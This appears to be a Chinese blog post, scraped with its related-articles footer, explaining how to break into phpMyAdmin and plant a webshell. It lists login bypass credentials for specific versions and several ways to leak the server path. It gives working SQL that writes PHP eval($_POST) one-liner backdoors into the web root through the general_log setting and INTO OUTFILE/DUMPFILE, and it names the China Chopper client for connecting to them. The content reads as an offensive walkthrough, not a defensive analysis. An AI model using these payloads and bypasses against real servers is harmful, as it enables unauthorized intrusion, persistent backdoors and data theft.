phpmyadmin

是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,      --百度百科

1.入口寻找

目录扫描:

根据Linux对大小写敏感判断目标服务器是win还是Linux

CMS特性

通过Google Hacking寻找

2.口令爆破

3.远程代码执行漏洞等

4.后台bypass(万能密码)

phpmyadmin2.11.3-2.11.4 这两个版本存在万能密码,直接使⽤‘localhost’@'@”为账号,密码不⽤输⼊。
phpmyadmin2.11.9.2 这个版本存在空口令。直接root⽤⼾登陆,密码不⽤
 

5.Getshell

5.1通过报错获取物理路径

如何报错?⼀般就是加 ' 等特殊字符
解析器(Web容器、中间件)报错
如 IIS7.5,如何报错?⼀般就是加⼀些不存在的⽬录名字

5.2通过google爆路径

结合关键字和site语法搜索出错⻚⾯的⽹⻚快照,常⻅关键字有warning和fatal error。注意,如果⽬标站点
是⼆级域名,
site接的是其对应的顶级域名,这样得到的信息要多得多。
Site:xxx.edu.tw warning
Site:xxx.com.tw "atal error

5.3根据正常安装文件路径猜

c:/phpStudy/phpstudy/PHPTutorial/WWW/

5.4读取解析器的配置⽂件

正常
正常情况我们是⽆法得知解析器的配置⽂件的,这个时候就是尝试解析器默认的安装路径。
取巧
假设某种情况下,我们得知⽬标是⽤的phpstudy,可是不是在默认的路径,我们就可以读取路径 select
@@basedir ,得到路径后,推测⽹站路径。

5.5旁站报错

什么是旁站?旁站是和目标网站在同一台服务器上的其它的网站。

⽐如⽬标站是 www.target.com ,它的邻居(旁站)
是:www.victim.com ,邻居⽹站有注⼊,加 ' 后爆出它的⽹站某个⻚⾯路径是:c:/wwwroot/victim/news.asp ,那
你根据这个推测你的⽬标站点的路径就有可能是 c:/wwwroot/target/ 
 

5.6phpinfo页面查看路径

scrver_filename:当前页面物理路径

5.7网站源备份

6.1通过日志拿shell

原理,phpmyadmin有⼀个general log的日志⽂件,但是⼀般情况下会关闭,开启⽇志记录,然后设置⽇志记录名称为.php,随便执⾏
sql语句,只要包括⼀句话木⻢就会被写⼊到⽇志中去,然后就可以连接getshell。 

通过sql语句将日志文件打开

set global general_log='on' //⾸先设置为on

set global general_log_file ="F:\\phpstudy\\WWW\\3.php"  \\ 将日志文件导入到.......php文件下

#执⾏⼀条带有⼀句话⽊⻢代码的SQL语句,如:
select “<?php eval($_POST['mima'])?>”; 

查看文件

菜刀链接

6.2通过导出拿shell

6.2.1正常导出拿shell

姿1. SELECT "<?php phpinfo();?>" INTO OUTFILE "E:\\wamp\\wamp\\www\\2.php"  
姿2. SELECT "<?php phpinfo();?>" INTO dumpFILE "E:\\wamp\\wamp\\www\\2.php" 
outfile函数可以导出多行,而dumpfile只能导出一行数据
outfile函数在将数据写到文件里时有特殊的格式转换,而dumpfile则保持原数据格式
 

6.2.2创建表导出

CREATE TABLE a (cmd text NOT NULL);
INSERT INTO a (cmd) VALUES('<?php eval($_POST[1]);?>');
select cmd from a into outfile 'D:/phpMyAdmin/libraries/d.php';
DROP TABLE IF EXISTS a; 

5.2.3. 猥琐型导出

PhPMyadmin拿Shell的更多相关文章

  1. PHPmyadmin拿shell总结

    PHPmyadmin修改用户密码 直接点击上面的localhost或者1270.0.1,出现用户一栏,点击修改即可 添加超级用户guetsec密码ooxx并且允许外连 GRANT ALL PRIVIL ...

  2. upupw phpmyadmin写shell

    废话: upupw给我的感觉是一个充当了waf毁三观的垃圾程序.然而,我讨厌的程序,管理员都特别喜欢用. 你会发现直接用之前那套写shell的建表然后在值里添加shell代码写到一个路径不可以了. C ...

  3. phpmyadmin任意文件包含漏洞分析(含演示)

    0x01 漏洞描述 phpmyadmin是一款应用非常广泛的mysql数据库管理软件,基于PHP开发. 最新的CVE-2014-8959公告中,提到该程序多个版本存在任意文件包含漏洞,影响版本如下: ...

  4. [CVE-2014-8959] phpmyadmin任意文件包含漏洞分析

    0x01 漏洞描述 phpmyadmin是一款应用非常广泛的mysql数据库管理软件,基于PHP开发. 最新的CVE-2014-8959公告中,提到该程序多个版本存在任意文件包含漏洞,影响版本如下: ...

  5. CTF线下赛AWD模式下的生存技巧

    作者:Veneno@Nu1L 稿费:200RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 原文:https://www.anquanke.com/post/id/8467 ...

  6. phpmyadmin后台4种拿shell方法 && php爆路径大法

    php后台拿shell要知道php的路径,文章下面将讲诉爆php路径的方法!!! 方法一: CREATE TABLE `mysql`.`xss` (`xss1` TEXT NOT NULL ); IN ...

  7. phpmyadmin后台拿shell方法总结

    方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma ...

  8. phpmyadmin拿网站shell

    开门见山 1. 找到一个赌博网站,发现存在php探针界面,在下面输入密码尝试用弱口令进行连接,尝试是否成功 失败的结果是这样. 2. 成功! 3. 连接成功的,点击phpMyAdmin管理,进行弱口令 ...

  9. Getshell Via phpmyadmin SQL Execution In /import.php To Write Evil Webshell File Into Disk

    目录 . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上 ...

随机推荐

  1. 前端vue小知识点

    前端转后端Json数据 this.orderList=JSON.parse(resp.parameter)

  2. Spring Cloud 学习 (十) Spring Security, OAuth2, JWT

    通过 Spring Security + OAuth2 认证和鉴权,每次请求都需要经过 OAuth Server 验证当前 token 的合法性,并且需要查询该 token 对应的用户权限,在高并发场 ...

  3. springmvc跨域问题

    1.跨域问题: 按照网上所有的方法试了一遍,都没跨过去,正在无助之际,使用filter按照下面的方法解决的时候出现了转机: 添加filter: package com.thc.bpm.filter; ...

  4. Error: Cannot find module '../lib/utils/unsupported.js'

    报错: nodejs : Error: Cannot find module '../lib/utils/unsupported.js' 解决办法(linux): 去node目录下:/node***/ ...

  5. [GKCTF2020]CheckIN 注意了解多方面的东西

    打开之后是这样的,没有发现反序列化函数,但是发现有一个@eval,想到了一句话,这是用base64进行传参首先传参phpinfo();看看,需要经过base64编码 http://e0cc90ac-d ...

  6. CSS图标与文字对齐的两种方法

    在平时写页面的过程中,常遇到要把小图标与文字对齐的情况.比如: 总结了两种方法,代码量都比较少. 第一种 对img设置竖直方向对齐为middle, <div> <img src=&q ...

  7. vue之keep-alive组件

    <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8&quo ...

  8. js去除html标签

    <script> //替换掉所有的 html标签,得到html标签中的内容 var content = "<p><font color=#000000>没 ...

  9. 学习笔记:Splay

    代码适中.非常灵活的平衡树. 需要前置:二叉搜索树. 一些基础的函数: int idx, ch[N][2], cnt[N], sz[N], fa[N]; /* idx 是节点计数, ch[i][0 / ...

  10. Codeforces Round #631 (Div. 1) A-C

    在 \(\text{Div. 2/3}\) 混了一个多月后,四个号终于都上紫了,也没用理由不打 \(\text{Div. 1}\) 了.这是我人生中的第一场 \(\text{Div .1}\) ,之前 ...